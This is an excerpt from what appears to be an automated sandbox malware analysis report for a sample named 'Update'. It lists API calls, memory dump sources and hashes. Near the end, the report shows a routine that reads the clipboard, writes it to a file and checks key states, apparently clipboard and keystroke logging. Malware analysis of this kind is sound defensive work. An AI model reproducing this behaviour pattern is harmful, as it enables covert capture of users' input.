                                                                                                • Instruction ID: 471dd78d3a1a0edd763090e981767fe38bb8b75876a5c810380f912b2b7294c0
                                                                                                • Opcode Fuzzy Hash: 297763f53ffc06b3f09c17544eef4313315b69f7d51b01d2aa6a5f5697ccda22
                                                                                                • Instruction Fuzzy Hash: 55C09B72D0143857CF10F7A4FD4494D77BC9F4C210F1145C2A108A3114C634BD41CF90
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6CAB0EE1,6CAB9DDA,?,00000000,00000000), ref: 6CAB0F48
                                                                                                • GetLastError.KERNEL32(?,00000000,?,6CAB0EE1,6CAB9DDA,?,00000000,00000000), ref: 6CAB0F52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseErrorHandleLast
                                                                                                • String ID:
                                                                                                • API String ID: 918212764-0
                                                                                                • Opcode ID: ecaeebceaf537962adbae016799dba513c215ad03801fcc96ce1a12adb3db82b
                                                                                                • Instruction ID: 3389cf4176e879568e6c55db48b2818bfd2bbaeb1b4252b7afcd9e103e71c0d4
                                                                                                • Opcode Fuzzy Hash: ecaeebceaf537962adbae016799dba513c215ad03801fcc96ce1a12adb3db82b
                                                                                                • Instruction Fuzzy Hash: FD114C327086905AC60917755B4979D3B9D4B8273CF2D4349E91CE7AC0EB30C9CA8280
                                                                                                APIs
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA977F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                • String ID:
                                                                                                • API String ID: 323602529-0
                                                                                                • Opcode ID: 82c8dfe2ec20ce6089d6270a3f39404919580cf6dad16e38d0d81ca0b97dc5a8
                                                                                                • Instruction ID: 12dcbd77d07bdec1f9523ea31a26c0b4cbcf5799db732740bc39061db37ed684
                                                                                                • Opcode Fuzzy Hash: 82c8dfe2ec20ce6089d6270a3f39404919580cf6dad16e38d0d81ca0b97dc5a8
                                                                                                • Instruction Fuzzy Hash: ED818DB1910B058FD324CF28C981BA6B7E5FF48304F548A2DD49A87B91E774F588CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9b5e556d0ee75180e04831f8c84e8448a041fa183930b1f821649dbe7987d53d
                                                                                                • Instruction ID: 941562c213e92e8efa1ec1059f082edb32c0fc1fe78c03dcddba90bf6664be28
                                                                                                • Opcode Fuzzy Hash: 9b5e556d0ee75180e04831f8c84e8448a041fa183930b1f821649dbe7987d53d
                                                                                                • Instruction Fuzzy Hash: 7E51A7B0A00284AFDB05CF58CE84A9DBFB5EF45328F18C159E859AB751D371DAC6CB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wsopen_s
                                                                                                • String ID:
                                                                                                • API String ID: 3347428461-0
                                                                                                • Opcode ID: 5de47762e49aa0ba01d7234bb37dbd5a0784c60f50d7eeaf288811bebc19bc0d
                                                                                                • Instruction ID: 9f9bd6f04f034269bc0979193feff365206c37fa868b071aecba9f414776ddb9
                                                                                                • Opcode Fuzzy Hash: 5de47762e49aa0ba01d7234bb37dbd5a0784c60f50d7eeaf288811bebc19bc0d
                                                                                                • Instruction Fuzzy Hash: 49114FB1A0420AAFCB05DF58EA4499B7BF9FF48304F154059F805AB311DA71DA15CBA4
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0380454A,00000000,00000001,00000000,00000000,00000000,?,03803E0D,00000001,00000214,?,03801EEF), ref: 0380A735
                                                                                                  • Part of subcall function 037FF91B: __getptd_noexit.LIBCMT ref: 037FF91B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 328603210-0
                                                                                                • Opcode ID: a29bfb9b5fe081b2189aa41eb9090c68ebb3dc18485be50d0a39c67afd79df50
                                                                                                • Instruction ID: dbbee97caa768607954156cae9202d36e581679a18b4ab5b4a6dad54ac322190
                                                                                                • Opcode Fuzzy Hash: a29bfb9b5fe081b2189aa41eb9090c68ebb3dc18485be50d0a39c67afd79df50
                                                                                                • Instruction Fuzzy Hash: 5101B5393017159EEB6CDEA9DC54B6A77A8AB817A0F19C6E9E895CB1E0DB3884018740
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598
                                                                                                  • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 328603210-0
                                                                                                • Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                                                                                • Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
                                                                                                • Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                                                                                • Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAAA641: HeapAlloc.KERNEL32(00000000,6CAADBE2,?,?,6CAADBE2,00000220,?,?,?), ref: 6CAAA673
                                                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,6CAA2C0C,00000000,?,6CAAFC77,00000000,6CAA2C0C,75FFDC79,?,75FFDC75,?,6CAA2CE6,?,75FFDC79), ref: 6CAB3572
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocAllocate
                                                                                                • String ID:
                                                                                                • API String ID: 2177240990-0
                                                                                                • Opcode ID: 48b55c8930c607e5dcd5741cf21d7a308de36ca64dd1081971337ff6978e9416
                                                                                                • Instruction ID: f7a910dac391af4b74b32cdc1d6579f183f8a0328fc692f34cddbf8f411f3162
                                                                                                • Opcode Fuzzy Hash: 48b55c8930c607e5dcd5741cf21d7a308de36ca64dd1081971337ff6978e9416
                                                                                                • Instruction Fuzzy Hash: 34F028322431057F9B051A2FAE00BEA37AC8FC2A68B158315E854B7990EF30D6D98561
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,?,?,6CAAA8E0,00000001,00000364,?,00000006,000000FF,?,?,6CAA5151,?,6CA81A6D,00000000), ref: 6CAACFB0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 9a573e777e9b210cee5b0b0f6e671aba0d5e4e9341cd892144ac378acca0ed16
                                                                                                • Instruction ID: e105b79095c2583477c7716b607db73b5a94ded5c0bf195480fb3f485c1c83bd
                                                                                                • Opcode Fuzzy Hash: 9a573e777e9b210cee5b0b0f6e671aba0d5e4e9341cd892144ac378acca0ed16
                                                                                                • Instruction Fuzzy Hash: E2F0E9326497255BFF017EE68804A8F77989F4976CB28C122EC18D7980DB32D99783E0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                                                • Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
                                                                                                • Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                                                • Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6CAB9C90,?,?,00000000,?,6CAB9C90,FFFFFFFF,0000000C), ref: 6CABA009
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: f6bdc8376301cec6160e22a50b7af9ae623a51c763608ff7c4f9c7872ec87123
                                                                                                • Instruction ID: b096faee2adb9d6c7398ac52d8e7008ff443401c2949a03840b4afd9f77167c7
                                                                                                • Opcode Fuzzy Hash: f6bdc8376301cec6160e22a50b7af9ae623a51c763608ff7c4f9c7872ec87123
                                                                                                • Instruction Fuzzy Hash: FAD06C3210020DBBDF028E85DC46EDA3BAAFB48714F018000BA1896020C732E9A2EB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3660427363-0
                                                                                                • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                • Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
                                                                                                • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                • Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1001FAB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentThread
                                                                                                • String ID:
                                                                                                • API String ID: 2882836952-0
                                                                                                • Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                                                • Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
                                                                                                • Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                                                • Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                                                • Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
                                                                                                • Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                                                • Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553
                                                                                                APIs
                                                                                                • TCGamerUpdateMain.UPDATE(?,?), ref: 006E100B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: GamerMainUpdate
                                                                                                • String ID:
                                                                                                • API String ID: 3533789159-0
                                                                                                • Opcode ID: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                                                                                • Instruction ID: 28034df6474dda31f037e6eb4f966e12df9777db339dfff13fbf2fa9710df3ca
                                                                                                • Opcode Fuzzy Hash: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                                                                                • Instruction Fuzzy Hash: 0DB092B666034C6B8B84EAD9EC42C9A339D5A49654B408018BE0C8F241E936FA9497A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: send
                                                                                                • String ID:
                                                                                                • API String ID: 2809346765-0
                                                                                                • Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                                                • Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
                                                                                                • Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                                                • Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f8d2e113b6967570d864d0ee9d7acc9061ba4fe6a939ffdc1cd7be47a58ccbd
                                                                                                • Instruction ID: 85d44c26d68dffdbcc28f8df62a843aa77d9d53a830265b461019e67592853c8
                                                                                                • Opcode Fuzzy Hash: 0f8d2e113b6967570d864d0ee9d7acc9061ba4fe6a939ffdc1cd7be47a58ccbd
                                                                                                • Instruction Fuzzy Hash: C461DF71A06A069BC704CFA9C4846B9B7B1FF45328B148729D27597E90E730E8D5CB91
                                                                                                APIs
                                                                                                • Sleep.KERNEL32 ref: 10005EB2
                                                                                                  • Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 617756273-0
                                                                                                • Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                                                • Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
                                                                                                • Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                                                • Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 90a522dfca6c0972462d0f11b992ae2bbcc4168f7715db6fa897f214e086ebb2
                                                                                                • Instruction ID: 74264c5d85e0896451430235ef1ff54d7ecad865ac635c95dc08874ee759efc0
                                                                                                • Opcode Fuzzy Hash: 90a522dfca6c0972462d0f11b992ae2bbcc4168f7715db6fa897f214e086ebb2
                                                                                                • Instruction Fuzzy Hash: 25A002B575220546478857B5580EC8665F45FA9712741C5217321D9144DA744191D525
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037FE8A9
                                                                                                • Sleep.KERNEL32(00000001,?,?,?,037F604D), ref: 037FE8B3
                                                                                                • GetTickCount.KERNEL32 ref: 037FE8BF
                                                                                                • GetTickCount.KERNEL32 ref: 037FE8D2
                                                                                                • InterlockedExchange.KERNEL32(03821F08,00000000), ref: 037FE8DA
                                                                                                • OpenClipboard.USER32(00000000), ref: 037FE8E2
                                                                                                • GetClipboardData.USER32(0000000D), ref: 037FE8EA
                                                                                                • GlobalSize.KERNEL32(00000000), ref: 037FE8FB
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 037FE90C
                                                                                                • wsprintfW.USER32 ref: 037FE985
                                                                                                • _memset.LIBCMT ref: 037FE9A3
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 037FE9AC
                                                                                                • CloseClipboard.USER32 ref: 037FE9B2
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 037FE9CA
                                                                                                • CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 037FE9E4
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FEA02
                                                                                                • lstrlenW.KERNEL32(03815B48,?,00000000), ref: 037FEA16
                                                                                                • WriteFile.KERNEL32(00000000,03815B48,00000000), ref: 037FEA25
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 037FEA2C
                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 037FEA38
                                                                                                • GetKeyState.USER32(00000014), ref: 037FEABC
                                                                                                • lstrlenW.KERNEL32(0381B4A8), ref: 037FEB0B
                                                                                                • wsprintfW.USER32 ref: 037FEB1D
                                                                                                • lstrlenW.KERNEL32(0381B4D0), ref: 037FEB3E
                                                                                                • lstrlenW.KERNEL32(0381B4D0), ref: 037FEB61
                                                                                                • wsprintfW.USER32 ref: 037FEB7F
